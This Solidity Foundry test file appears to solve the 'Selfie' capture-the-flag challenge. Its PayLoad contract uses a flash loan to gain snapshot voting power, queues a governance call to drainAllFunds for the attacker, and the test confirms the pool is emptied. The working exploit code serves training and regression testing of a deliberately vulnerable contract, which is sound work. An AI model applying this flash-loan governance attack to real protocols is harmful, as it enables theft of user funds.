Selfie.t.sol
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
import {Utilities} from "./utils/Utilities.sol";
import "forge-std/Test.sol";
import {DamnValuableTokenSnapshot} from "../DamnValuableTokenSnapshot.sol";
import {SimpleGovernance} from "../selfie/SimpleGovernance.sol";
import {SelfiePool} from "../selfie/SelfiePool.sol";
/// @notice Test-only helper for the Selfie challenge. It takes a flash loan from the pool and,
///         while it still holds the borrowed tokens, snapshots the token and queues a
///         governance action that targets the pool.
/// @dev Defender's reading: the sequence in `receiveTokens` only works if governance accepts
///      voting power that exists for a single transaction. Presumably SimpleGovernance checks
///      the proposer's balance at the most recent snapshot, and `snapshot()` is callable by
///      any account; confirm both against SimpleGovernance.sol and
///      DamnValuableTokenSnapshot.sol, which are not part of this file.
contract PayLoad {
    /// @notice Account that deployed this contract; used as the argument of the queued call.
    address public attacker;

    /// @notice Id returned by `queueAction`, read back by the test to execute the action.
    uint256 public actionId;

    /// @notice Amount requested from the pool (same value as the test's TOKENS_IN_POOL).
    /// @dev The identifier is misspelled ("falsh"), but it is a public getter, so it is kept
    ///      as-is to leave the contract's ABI unchanged.
    uint256 public constant falshloan_amount = 1_500_000e18;

    DamnValuableTokenSnapshot public dvt;
    SimpleGovernance public simplegovernance;
    SelfiePool public selfiePool;

    /// @param _dvtaddr Snapshot-capable token used by the pool and by governance.
    /// @param _simplegovernanceaddr Governance contract the action is queued on.
    /// @param _selfiePooladdr Flash-loan pool that is both lender and action target.
    constructor(
        DamnValuableTokenSnapshot _dvtaddr,
        SimpleGovernance _simplegovernanceaddr,
        SelfiePool _selfiePooladdr
    ) {
        attacker = msg.sender;
        dvt = _dvtaddr;
        simplegovernance = _simplegovernanceaddr;
        selfiePool = _selfiePooladdr;
    }

    /// @notice Requests the flash loan; the rest of the flow runs in `receiveTokens`.
    function startAttack() public {
        selfiePool.flashLoan(falshloan_amount);
    }

    /// @notice Handles the borrowed tokens: snapshot, queue the action, repay.
    /// @dev Presumably invoked by the pool as its flash-loan callback; confirm in
    ///      SelfiePool.sol. NOTE(review): the function is public with no caller check and
    ///      `tokenAddr` is unused; tolerable only because this is a test fixture.
    /// @param tokenAddr Unused.
    /// @param amount Amount transferred back to the pool at the end of the call.
    function receiveTokens(address tokenAddr, uint256 amount) public {
        // Calldata for drainAllFunds(address) with the deployer as the argument.
        bytes memory drainCall = abi.encodeWithSignature("drainAllFunds(address)", attacker);

        // The snapshot is taken while the borrowed balance is still held here, before
        // the action is queued.
        dvt.snapshot();
        actionId = simplegovernance.queueAction(address(selfiePool), drainCall, 0);

        // Repay the loan within the same call.
        dvt.transfer(address(selfiePool), amount);
    }
}
/// @notice Foundry test for the Selfie challenge: deploys the token, governance and pool,
///         then checks that the PayLoad flow leaves the pool empty.
/// @dev Read as a regression test for the governance design. If voting power were measured
///      in a way a same-transaction flash loan cannot satisfy, `testExploit` would presumably
///      stop passing; confirm against SimpleGovernance.sol, which is not shown here.
contract Selfie is Test {
    uint256 internal constant TOKEN_INITIAL_SUPPLY = 2_000_000e18;
    uint256 internal constant TOKENS_IN_POOL = 1_500_000e18;

    Utilities internal utils;
    SimpleGovernance internal simpleGovernance;
    SelfiePool internal selfiePool;
    DamnValuableTokenSnapshot internal dvtSnapshot;
    PayLoad internal payload;
    address payable internal attacker;

    /// @notice Deploys the system under test and funds the pool with TOKENS_IN_POOL.
    function setUp() public {
        utils = new Utilities();
        attacker = utils.createUsers(1)[0];
        vm.label(attacker, "Attacker");

        dvtSnapshot = new DamnValuableTokenSnapshot(TOKEN_INITIAL_SUPPLY);
        vm.label(address(dvtSnapshot), "DVT");

        simpleGovernance = new SimpleGovernance(address(dvtSnapshot));
        vm.label(address(simpleGovernance), "Simple Governance");

        selfiePool = new SelfiePool(address(dvtSnapshot), address(simpleGovernance));

        // Move the pool's share out of the test contract's balance and confirm it arrived.
        dvtSnapshot.transfer(address(selfiePool), TOKENS_IN_POOL);
        assertEq(dvtSnapshot.balanceOf(address(selfiePool)), TOKENS_IN_POOL);
    }

    /// @notice Runs the whole flow as `attacker`: deploy PayLoad, queue the action during
    ///         the flash loan, advance time, execute the queued action, then verify.
    function testExploit() public {
        vm.startPrank(attacker);

        // PayLoad takes the token, governance and pool handles, in that order.
        payload = new PayLoad(dvtSnapshot, simpleGovernance, selfiePool);
        payload.startAttack();

        // Presumably the delay governance requires before execution; confirm the value
        // against SimpleGovernance.sol.
        utils.mineTime(2 days);

        uint256 queuedActionId = payload.actionId();
        simpleGovernance.executeAction(queuedActionId);

        vm.stopPrank();
        verify();
    }

    /// @notice Success condition: the attacker holds TOKENS_IN_POOL and the pool holds none.
    function verify() internal {
        uint256 attackerBalance = dvtSnapshot.balanceOf(attacker);
        uint256 poolBalance = dvtSnapshot.balanceOf(address(selfiePool));

        assertEq(attackerBalance, TOKENS_IN_POOL);
        assertEq(poolBalance, 0);
    }
}